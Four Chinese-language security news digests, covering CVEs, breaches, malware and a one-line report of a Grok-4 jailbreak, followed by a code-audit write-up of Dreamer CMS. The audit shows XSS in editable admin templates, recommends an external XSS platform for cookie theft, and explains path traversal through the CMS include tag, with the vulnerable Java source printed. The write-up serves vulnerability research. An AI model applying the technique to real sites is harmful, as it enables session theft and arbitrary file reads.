1、OpenVSX供应链零日漏洞影响千万开发者 https://www.bleepingcomputer.com/news/security/the-zero-day-that-couldve-compromised-every-cursor-and-windsurf-user/ 研究员披露OpenVSX扩展市场存在高危“VSXPloit”零日漏洞。攻击者可借夜间自动构建流程窃取@open-vsx发布令牌，向Cursor、Windsurf、VSCodium等千万台设备推送恶意扩展，实现无提示远程代码执行。该缺陷源自社区提交的拉取请求可在构建阶段运行任意代码，令牌因而泄露。Koi已协同Eclipse基金会完成修复，但事件再次警示开发者：扩展 2、Kigen eSIM漏洞波及20亿物联网设备 https://thehackernews.com/2025/07/esim-vulnerability-in-kigens-euicc.html 安全公司披露爱尔兰公司Kigen的eUICC卡存在严重安全缺陷。该漏洞源于GSMA TS.48通用测试配置文件6.0及更早版本，可允许攻击者在获取物理访问并掌握公开密钥后，向卡内植入恶意JavaCard小程序，进而窃取KigeneUICC身份证书。利用该证书，攻击者能够以明文形式从移动网络运营商处下载任意配置文件，篡改或植入后门，并绕过运营商监控。据Kigen官网数据，截至2020年底，已有逾20亿张物联网设备使用其eSIM。GSMA已在6月发布 3、WingFTP严重RCE漏洞遭黑客利用 https://www.bleepingcomputer.com/news/security/hackers-are-exploiting-critical-rce-flaw-in-wing-ftp-server/ 安全机构披露黑客已开始利用Wing FTP Server 7.4.3及更早版本中的CVE-2025-47812漏洞。该漏洞结合空字节与Lua注入，可让未经身份验证的远程攻击者直接以root/SYSTEM权限执行任意代码。安全研究员于6月30日公开技术细节后仅一天，监测到至少五个IP地址对暴露服务器发起大规模扫描与利用尝试，攻击者通过畸形登录请求注入恶意Lua会话文件，下载并执行远 4、LVMH集团英国客户数据失窃 https://www.theguardian.com/technology/2025/jul/11/louis-vuitton-uk-customer-data-stolen-cyber-attack 法国LVMH集团确认旗下路易威登英国系统于7月2日遭第三方入侵，部分客户姓名、联系方式及购买历史被窃，财务信息未受波及。该品牌韩国业务上周亦遇类似攻击，三个月内LVMH旗下品牌已三度中招。路易威登已向英国信息专员办公室报告，并提醒客户警惕钓鱼诈骗。 5、英国警方逮捕Scattered Spider组织嫌疑人 https://securityboulevard.com/2025/07/arrests-scattered-spider-richixbw 英国警方在黎明突袭中逮捕了四名涉嫌参与散落蜘蛛（Scattered Spider）黑客组织的嫌疑人。该组织被指控自四月以来对玛莎百货、合作社和哈罗德百货等大型零售商发动网络攻击，导致玛莎百货暂停网上服装购物近七周，损失约3亿英镑营业利润。被捕的四人包括三名男性和一名女性，年龄在17至20岁之间，分别来自英国西米德兰兹和伦敦。他们的电子设备被扣押，目前正接受国家犯罪局（NCA）的讯问。尽管警方尚未确认其与“散落蜘蛛”的直接关联，但网络安全专家认为该组织 6、Grok-4 AI上线48小时即遭新型组合越狱攻击攻破 https://www.freebuf.com/articles/ai-security/439264.html 大型语言模型Grok-4在推出仅两天后，就被研究人员通过结合"回声室(Echo Chamber)"和"渐强(Crescendo)"技术成功突破防御系统，暴露出AI安全机制存在重大缺陷。 7、热门IP摄像头存在隐蔽后门，攻击者可获取Root权限 https://securityonline.info/cve-2025-7503-cvss-10-hidden-backdoor-in-popular-ip-camera-grants-hackers-root-access/ 国内某IP摄像头存在高危漏洞（CVE-2025-7503，CVSS 10分），默认开启未公开Telnet服务，硬编码凭证可获取root权限，威胁监控画面与内网安全，暂无补丁，建议隔离网络或更换设备。 8、技嘉UEFI固件SMM漏洞使系统面临固件植入和持久控制风险 https://securityonline.info/smm-vulnerabilities-in-gigabyte-uefi-firmware-expose-systems-to-stealthy-attacks/ 技嘉UEFI固件存在4个高危SMM漏洞（CVE-2025-7026至7029），攻击者可利用漏洞在Ring -2级执行任意代码，绕过安全启动并植入持久性固件后门。技嘉已发布补丁，建议用户立即更新。 9、GPUHammer：首个针对NVIDIA GPU的Rowhammer攻击技术 https://cybersecuritynews.com/gpuhammer-attack/ 多伦多大学团队首次成功对NVIDIA显卡实施Rowhammer攻击（GPUHammer），证明GDDR6显存存在漏洞，可导致AI模型精度暴跌80%。NVIDIA建议启用ECC防护，但会牺牲性能。该漏洞凸显GPU在AI时代面临的安全风险，影响全球数百万系统。 10、Linux 内核曝高危漏洞：可UAF实现本地提权 https://securityonline.info/linux-kernel-flaw-root-privilege-escalation-via-use-after-free-poc-available/ Linux内核曝高危UAF漏洞，攻击者可利用HFSC与NETEM交互层缺陷通过恶意数据包获取root权限，PoC已公开。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、MacOS.ZuRu恶意软件通过篡改Termius应用程序传播 https://www.sentinelone.com/blog/macos-zuru-resurfaces-modified-khepri-c2-hides-inside-doctored-termius-app/ 安全研究人员发现，MacOS.ZuRu后门的最新变种通过篡改的Termius应用程序传播。该恶意软件最初于2021年7月被发现，主要通过百度上的恶意网页搜索结果传播。此次攻击中，攻击者将合法的Termius应用程序木马化，通过磁盘映像（.dmg）传播。木马版本比合法版本大，因为添加了恶意二进制文件。攻击者还替换了开发者的代码签名，以绕过macOS的代码签名规则。该恶意软件使用修 2、GoldMelody攻击活动利用ASPNET漏洞入侵服务器 https://unit42.paloaltonetworks.com/initial-access-broker-exploits-leaked-machine-keys/ 研究人员发现了一个名为GoldMelody（临时编号TGR-CRI-0045）的攻击活动，该组织利用泄露的ASP.NET机器密钥，通过IIS模块的视图状态反序列化漏洞入侵服务器。攻击者通过恶意负载签名绕过保护机制，在服务器内存中直接执行代码，留下极少痕迹，增加了检测难度。此次攻击主要针对欧美地区的金融服务、制造业、高科技等行业，攻击活动自2024年10月开始，2025年初显著增加。受害者多因机器密钥泄露而被入侵。研究人 3、LogoKit网络钓鱼活动瞄准全球多目标窃取凭证 https://cyble.com/blog/logokit-being-leveraged-for-credential-theft/ 安全研究机构发现了一起利用LogoKit工具包的网络钓鱼活动，该活动通过提取品牌资产并模仿合法网站来窃取用户凭证。攻击者利用Clearbit和Google Favicon获取目标组织的徽标，增强钓鱼页面的可信度。钓鱼页面托管在Amazon S3上，使用Cloudflare Turnstile增加安全性假象。此次攻击活动已针对匈牙利政府机构、银行和物流公司等全球多个实体，攻击链接在VirusTotal上未被检测到，表明活动仍在持续进行。专家建议用户采取主动防 4、、浏览器扩展暗藏恶意劫持与监视功能 https://blog.koi.security/google-and-microsoft-trusted-them-2-3-million-users-installed-them-they-were-malware-fb4ed4f40ff5 网络安全研究团队发现一系列热门浏览器扩展程序存在恶意行为。这些扩展包括表情符号键盘、天气预报、视频速度控制器等工具，表面上提供合法功能，实则暗中监视用户浏览器活动并劫持页面。这些扩展程序通过命令和控制服务器（如admitclick.net）发送用户数据，并可能自动重定向用户到恶意页面。值得注意的是，这些扩展程序部分已在Chrome和Edge商店获得 5、Ruckus Networks管理设备多个漏洞未修复 https://www.bleepingcomputer.com/news/security/ruckus-networks-leaves-severe-flaws-unpatched-in-management-devices/ Ruckus Networks的管理设备被发现存在多个严重漏洞，但截至目前仍未修复。这些漏洞影响Ruckus Wireless Virtual SmartZone (vSZ) 和Ruckus Network Director (RND)，涉及未经身份验证的远程代码执行、硬编码密码、SSH密钥以及路径遍历等问题。受影响的产品广泛用于大型组织和公共实体的WiFi基础设 6、AMD发出警告新型瞬态调度程序攻击影响多款CPU https://thehackernews.com/2025/07/amd-warns-of-new-transient-scheduler.html 半导体公司AMD警告称，一种名为瞬态调度程序攻击（TSA）的新型漏洞可能影响其多款处理器，导致信息泄露。TSA是一种推测性侧信道攻击，利用CPU的微架构特性，通过指令执行时间推断数据。研究人员在对虚拟机、内核和进程等安全域进行压力测试时发现了这些问题。AMD已为受影响的处理器发布微代码更新，包括第三代至第四代EPYC处理器、Ryzen系列处理器等。攻击者需获得目标机器的访问权限才能利用这些漏洞，专家表示，TSA的利用条件是暂时的，但攻击者可能 7、mcp-remote安全漏洞可致远程代码执行 https://jfrog.com/blog/2025-6514-critical-mcp-remote-rce-vulnerability/ 安全研究团队发现mcp-remote项目存在高危漏洞CVE-2025-6514，CVSS评分达9.6。该工具常用于使大型语言模型（LLM）客户端与远程MCP服务器通信。漏洞允许攻击者在客户端连接到不受信任的MCP服务器时，触发任意操作系统命令执行，可能导致系统全面入侵。受影响版本为0.0.5至0.1.15，0.1.16版本已修复。攻击场景包括连接到恶意服务器或通过不安全方式连接被中间人攻击劫持。用户应更新至0.1.16版本或仅通过HTTPS连接受信任 8、日本新日铁公司遭零日攻击致数据泄露 https://securityaffairs.com/179766/data-breach/nippon-steel-solutions-data-breach.html 日本新日铁的子公司新日铁解决方案公司披露了一起数据泄露事件。该公司提供云和网络安全服务，但其网络设备被黑客利用零日漏洞攻击，导致数据泄露。2025年3月7日，公司检测到可疑服务器活动并隔离了受影响系统。调查显示，攻击者通过零日漏洞未经授权访问了公司内部网络，可能泄露了客户、合作伙伴和员工的个人信息，包括姓名、公司名称、职位、电子邮件地址和电话号码等。公司表示，云服务未受影响，且没有证据表明信息已在社交媒体或暗网上泄露。目 9、Fortinet发布FortiWeb SQL注入漏洞补丁 https://thehackernews.com/2025/07/fortinet-releases-patch-for-critical.html Fortinet发布针对FortiWeb中严重SQL注入漏洞（CVE-2025-25257）的修复程序。该漏洞CVSS评分为9.6，攻击者可通过精心设计的HTTP或HTTPS请求，在未授权情况下执行SQL代码或命令。受影响版本包括FortiWeb 7.6.0至7.6.3、7.4.0至7.4.7、7.2.0至7.2.10、7.0.0至7.0.10，用户需分别升级到对应更高版本。问题根源在于“get_fabric_user_by_token”函数 10、GitHub泄露APP_KEY危及600多个Laravel应用 https://thehackernews.com/2025/07/over-600-laravel-apps-exposed-to-remote.html 安全公司GitGuardian与Synacktiv联合披露，2018年至2025年5月间，GitHub公共仓库共暴露逾26万个Laravel APP_KEY，其中400个经确认有效，直接令600余个线上应用可被远程执行任意代码。泄露源六成来自被误上传的.env文件，且伴随数据库、云令牌等敏感信息；约2.8万对“APP_KEY+APP_URL”同时暴露，使攻击者可直接定位并入侵目标。该风险源于Laravel自动反序列化解密数据的机制，配合 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、DoNot APT组织针对南欧政府实体发动复杂网络攻击 https://www.trellix.com/blogs/research/from-click-to-compromise-unveiling-the-sophisticated-attack-of-donot-apt-group-on-southern-european-government-entities/ 近日安全研究机构发布报告，揭露了DoNot APT组织（也称APT-C-35）针对南欧政府实体的复杂攻击活动。DoNot APT自2016年以来一直活跃，主要针对南亚和欧洲的政府机构、外交部和非政府组织，以网络间谍活动为主。此次攻击通过鱼叉式网络钓鱼电子邮件，冒充欧洲国防官员， 2、研究人员发现名为TapTrap新型Android攻击技术 https://taptrap.click/ 研究人员发现了一种名为TapTrap的新型Android攻击技术，该技术利用隐形用户界面（UI）技巧绕过Android权限系统，欺骗用户执行危险操作，例如擦除设备或授权敏感权限。与传统的tapjacking攻击不同，TapTrap可以在无需任何权限的情况下启动透明活动，覆盖在正常应用程序之上，使用户在不知情的情况下点击危险按钮。该技术由维也纳技术大学和拜罗伊特大学的研究团队开发，并将在USENIX安全研讨会上展示。研究人员分析了近10万个Play Store应用程序，发现其中76%的应用容易受到TapTrap攻击。谷歌已确认注意到该问题，并将在未 3、攻击者利用CitrixBleed 2漏洞窃取会话令牌 https://horizon3.ai/attack-research/attack-blogs/cve-2025-5777-citrixbleed-2-write-up-maybe/ 研究机构发布公告，披露了CVE-2025-5777漏洞，该漏洞被命名为CitrixBleed 2。尽管声称该漏洞与2023年的CitrixBleed（CVE-2023-4966）无关，但研究人员发现，攻击者可通过发送格式错误的HTTP请求，从NetScaler设备中窃取用户会话令牌等敏感信息。研究人员已开发出针对该漏洞的利用程序，并警告称攻击者可能已开始利用该漏洞进行攻击。专家建议用户立即应用补丁，终止所有活 4、ServiceNow新漏洞可让攻击者枚举受限数据 https://www.bleepingcomputer.com/news/security/new-servicenow-flaw-lets-attackers-enumerate-restricted-data/ ServiceNow平台被发现存在一个名为“Count(er) Strike”的漏洞，编号为CVE-2025-3648，该漏洞允许低权限用户从无权访问的表中提取敏感数据。ServiceNow是一个基于云的平台，广泛应用于公共部门、医疗保健、金融机构和大型企业。该漏洞由Varonis Threat Labs在2025年2月发现，可能影响配置错误或过于宽松的访问控制列表（ACL）。 5、玛莎百货遭社会工程学攻击引发勒索软件入侵 https://www.bleepingcomputer.com/news/security/mands-confirms-social-engineering-led-to-massive-ransomware-attack/ 玛莎百货确认其网络遭到复杂的社会工程学攻击，最终导致DragonForce勒索软件入侵。该公司董事长阿奇·诺曼在英国议会听证会上表示，攻击始于4月17日，攻击者冒充公司员工诱骗第三方重置密码，从而入侵网络。据《金融时报》报道，IT外包公司塔塔咨询服务公司可能在不知情的情况下协助了攻击者重置密码。此次攻击被认为由位于亚洲的DragonForce勒索软件团伙发起。尽管玛 6、Rockerbox税务公司服务器泄露286GB记录 https://hackread.com/rockerbox-server-tax-firm-exposed-sensitive-records/ 总部位于德克萨斯州的税收抵免咨询公司Rockerbox发生数据泄露事件，网络安全研究人员发现其服务器上有286GB数据未设密码保护，涉及245,949条记录。泄露数据包括社保号、DD214表格、财务信息、全名、出生日期、地址等敏感信息，还包含驾驶执照和与就业、税务相关的文件。此次事件可能导致身份盗窃和金融欺诈风险。虽然数据库在被发现后几天内被保护起来，但Rockerbox尚未对披露做出回应。目前尚不清楚数据暴露时间及是否有未经授权的访问。 7、Linux内核NFT子系统曝高危漏洞可导致本地提权 https://www.freebuf.com/articles/network/438686.html Linux内核的NFT（netfilter）子系统中的pipapo集合模块被发现存在严重的"双重释放"（double-free）漏洞。该高危安全缺陷允许低权限攻击者通过特制的netlink消息触发内核内存破坏，最终实现本地权限提升。 8、负鼠攻击：新型漏洞威胁TLS，可实施中间人攻击与数据注入 https://securityonline.info/opossum-attack-new-vulnerability-compromises-encrypted-tls-connections-allowing-mitm-data-injection/ 研究人员发现"负鼠攻击"漏洞，利用隐式TLS与机会型TLS共存缺陷，可破坏加密连接完整性，甚至绕过先进TLS方案。攻击者能注入恶意请求，导致资源混淆等风险。建议彻底弃用机会型TLS协议以消除隐患。 9、麦当劳AI招聘系统密码设为"123456" 致6400万求职者数据泄露 https://cybersecuritynews.com/mcdonalds-ai-hiring-bot-leaks/ 麦当劳AI招聘系统因密码"123456"等漏洞致6400万求职者信息泄露，暴露自动化招聘流程中关键网络安全缺陷，缺乏多因素认证等基本防护措施。 10、Windows Update 漏洞：通过任意文件夹删除实现 SYSTEM 权限提升 https://securityonline.info/windows-update-flaw-system-privilege-escalation-via-arbitrary-folder-deletion-poc-available/ Windows Update高危漏洞允许攻击者通过删除文件夹获取SYSTEM权限，利用符号链接缺陷突破权限隔离，威胁严重。PoC已公开。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、Anatsa木马瞄准北美移动银行客户 https://www.threatfabric.com/blogs/anatsa-targets-north-america-uses-proven-mobile-campaign-process 研究人员发现Anatsa Android 银行木马正在针对北美用户发起攻击。这是该木马第三次将攻击重点放在美国和加拿大的移动银行客户上。Anatsa是一款复杂的设备接管木马，通过覆盖攻击、键盘记录等方式窃取凭证，并可直接执行欺诈交易。此次攻击活动通过Google Play商店传播，攻击者先发布合法应用，如PDF阅读器，待获得大量用户后，通过更新嵌入恶意代码。攻击期间，用户银行应用可能显示“维护” 2、恶意Pull请求入侵Ethcode VS Code扩展 https://www.reversinglabs.com/blog/malicious-pull-request-infects-vscode-extension 网络安全研究人员发现，一款名为Ethcode的VS Code扩展程序遭到恶意供应链攻击。该扩展用于以太坊智能合约开发，安装量已超6000次。攻击者通过GitHub拉取请求（PR）引入恶意代码，伪装成正常更新。此次入侵由名为Airez299的用户于2025年6月17日发起，该用户创建的唯一目的是感染代码库。恶意代码通过调用混淆的依赖项“keythereum-utils”，下载并运行恶意脚本。该脚本可能用于窃取加密资产或破坏用户开发 3、黑客滥用泄露的Shellter红队工具发起攻击 https://www.bleepingcomputer.com/news/security/hackers-abuse-leaked-shellter-red-team-tool-to-deploy-infostealers/ 黑客利用泄露的Shellter红队工具发起攻击，部署信息窃取程序。Shellter是一款用于渗透测试的商业工具，其Elite版本被黑客滥用，传播恶意软件。研究机构指出威胁行为体自4月起通过YouTube评论和网络钓鱼邮件传播恶意软件。Shellter表示，此次事件源于一名客户泄露软件副本，该公司已发布更新并限制受影响版本的分发。 4、微软紧急修复高危蠕虫级RCE漏洞 https://www.freebuf.com/articles/system/438515.html 微软已发布关键安全更新，修复编号为CVE-2025-47981的高危漏洞。该漏洞存在于SPNEGO扩展协商(NEGOEX)安全机制中，属于基于堆的缓冲区溢出漏洞，影响多个Windows和Windows Server版本。 5、大规模浏览器劫持活动，已感染超230万用户 https://www.freebuf.com/articles/es/438507.html 一场大规模浏览器劫持活动通过Google Chrome和Microsoft Edge上的18款恶意扩展程序，已感染超过230万用户。尽管这些扩展拥有认证标识和高评分，却暗中部署监控代码，引发对浏览器扩展审核机制的严重质疑。 6、Ruckus Wireless 无线设备曝出 9 个高危漏洞 https://www.freebuf.com/articles/network/438547.html 2025年7月10日- 研究人员在 Ruckus Wireless 的 Virtual SmartZone（vSZ，虚拟智能区域）和 Network Director（RND，网络管理器）产品中发现多个高危漏洞，这些漏洞对学校、医院、智慧城市和企业网络中的无线环境安全构成严重威胁。这些漏洞类型包括硬编码凭证、认证绕过和未经认证的远程代码执行（RCE，Remote Code Execution），可能导致受影响系统被完全攻陷。 7、微软365 PDF导出功能存在本地文件包含漏洞 https://www.freebuf.com/articles/database/438517.html 微软365的"导出为PDF"功能近期被发现存在严重的本地文件包含(Local File Inclusion, LFI)漏洞，攻击者可利用该漏洞获取服务器端的敏感数据，包括配置文件、数据库凭证和应用程序源代码。 8、微软远程桌面客户端漏洞可导致攻击者远程执行代码 https://www.freebuf.com/articles/system/438460.html 微软远程桌面客户端存在一个严重安全漏洞，攻击者可利用该漏洞在受害者系统上执行任意代码。该漏洞编号为CVE-2025-48817，影响多个Windows版本，对依赖远程桌面协议(RDP)连接的组织构成重大安全风险。 9、Git项目修复三大漏洞：远程代码执行、任意文件写入与缓冲区溢出 https://securityonline.info/git-project-patches-3-flaws-rce-arbitrary-file-writes-buffer-overflow/ Git修复三个高危漏洞：克隆时可远程执行代码（CVE-2025-48384）、Bundle-URI注入任意文件写入（CVE-2025-48385）和Windows凭据缓冲区溢出（CVE-2025-48386）。建议立即升级至v2.50.1或长期支持版本。 10、Zoom修复六大漏洞：全平台存在拒绝服务、信息泄露及跨站脚本风险 https://securityonline.info/zoom-patches-6-flaws-dos-info-disclosure-xss-across-all-platforms/ Zoom修复6个跨平台漏洞，涉及DoS、信息泄露和XSS风险，影响Windows、macOS、Linux、iOS和Android。严重漏洞包括Linux证书验证缺陷和Windows缓冲区溢出。建议立即升级至最新版本确保安全。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

前言 最近看到由有分析梦想 CMS 的，然后也去搭建了一个环境看了一看，发现了一个文件包含漏洞的点，很有意思，下面是详细的复现和分析，以后代码审计又多了一中挖掘文件包含漏洞的新思路。 环境搭建 下载https://gitee.com/iteachyou/dreamer_cms 然后各种配置都可以看到 JDK：Jdk8IDE：Spring Tool Suite 4（STS）或 IntelliJ IDEA DB：Mysql 5.7，Windows配置安装Mysql5.7，请参考： https://www.iteachyou.cc/article/a1db138b4a89402ab50f3499edeb30c2Redis：3.2+，Windows配置安装Redis教程，请参考： https://www.iteachyou.cc/article/4b0a638f65fa4fb1b9644cf461dba602修改一下配置文件中的 resource-path 和 mysql 的连接 漏洞寻找过程 进入后台后发现可以编辑模板文件 然后这时候我们就需要注意常见的可以触发漏洞的点了 首先就是 xss 加入我们的 xss 代码 然后访问首页 成功 xss，当然我们真实使用的话可以利用我们的 xss 平台 这里推荐与一个 https://xssaq.com/点击配置代码后会有很多 payload，随便复制一个 这里我们简单弹个 cookie xss 的话还是国外使用比较多 当然这样并不能达到我们 getshell 的目的 漏洞深入利用 这里就不得不提到我们的一些标签了 一般常见的我们可以尝试 include 标签 这里我们先复现一下 这个标签是 cms 的专属的标签 然后我们根据目录关系创建一个文件尝试一下 然后我们访问首页 可以看到成功了 调试分析 我们调试分析一下，抓个包看看路由 定位到代码 @Log(operType = OperatorType.UPDATE, module = "模板管理", content = "修改模板") @PostMapping("save") @RequiresPermissions("5n6ta53y") public String save(TemplateVo template) throws IOException, CmsException { String fileName = template.getPath() + File.separator + template.getFile(); File templateFile = new File(fileName); /** * 查询当前模版目录，判断是否为模版目录，如不是，则报错 */ Theme currentTheme = themeService.getCurrentTheme(); String resourceDir = fileConfiguration.getResourceDir(); String themePath = resourceDir + File.separator + "templates" + File.separator + currentTheme.getThemePath() + File.separator; themePath = themePath.replaceAll("\\*", "/"); File themeDir = new File(themePath); // 检查当前编辑文件是否有权限 if(!templateFile.getCanonicalPath().startsWith(themeDir.getCanonicalPath())) { throw new TemplatePermissionDeniedException(StateCodeEnum.HTTP_FORBIDDEN.getCode(), StateCodeEnum.HTTP_FORBIDDEN.getDescription(), "您没有操作权限！"); } if(!templateFile.exists()) { throw new TemplateNotFoundException(StateCodeEnum.HTTP_NOTFOUND.getCode(), StateCodeEnum.HTTP_NOTFOUND.getDescription(), "模板文件不存在！"); } String filePath = template.getPath() + File.separator + template.getFile(); filePath = filePath.replaceAll("\\*", "/"); File file = new File(filePath); FileUtils.writeStringToFile(file, template.getContent(), "UTF-8"); return "redirect:/admin/templates/toIndex"; } 这里就是就简单的写一下模板，然后重点关注解析的部分 这里有各种各样的标签 看到我们的 Include 标签 @Tag(beginTag="{dreamer-cms:include /}",endTag="{/dreamer-cms:include}",regexp="(\\{dreamer-cms:include[ \\t]+.*/\\})|(\\{dreamer-cms:include[ \\t]+.*\\}\\{/dreamer-cms:include\\})", attributes={ @Attribute(name = "file",regex = "[ \t]+file=[\"\'].*?[\"\']"), }) 格式 我们看一下解析过程 首先是解析我们的模板 识别我们的模板内容后开始解析各种标签，然后是我们的 include public String parse(String html) { Tag annotations = IncludeTag.class.getAnnotation(Tag.class); Attribute[] attributes = annotations.attributes(); List<String> all = RegexUtil.parseAll(html, annotations.regexp(), 0); if(StringUtil.isBlank(all)) { return html; } String newHtml = html; String resourceDir = fileConfiguration.getResourceDir() + "templates/"; Theme currentTheme = themeService.getCurrentTheme(); String templatePath = currentTheme.getThemePath() + "/"; String basePath = resourceDir + templatePath; for (int i = 0; i < all.size(); i++) { Map<String,Object> entity = new HashMap<String,Object>(); String includeTag = all.get(i); for (Attribute attribute : attributes) { String condition = RegexUtil.parseFirst(includeTag, attribute.regex(), 0); if(StringUtil.isBlank(condition)) { continue; } String key = condition.split("=")[0]; String value = condition.split("=")[1]; key = key.trim(); value = value.replace("\"", "").replace("\'", ""); entity.put(key, value); } if(entity.keySet() != null && entity.keySet().size() > 0) { String path = basePath + entity.get("file").toString(); File includeFile = new File(path); String includeHtml; try { includeHtml = FileUtils.readFileToString(includeFile, "UTF-8"); newHtml = newHtml.replaceFirst(annotations.regexp(), includeHtml); } catch (IOException e) { e.printStackTrace(); } } } return newHtml; } 可以目录穿越读取我们任意文件的内容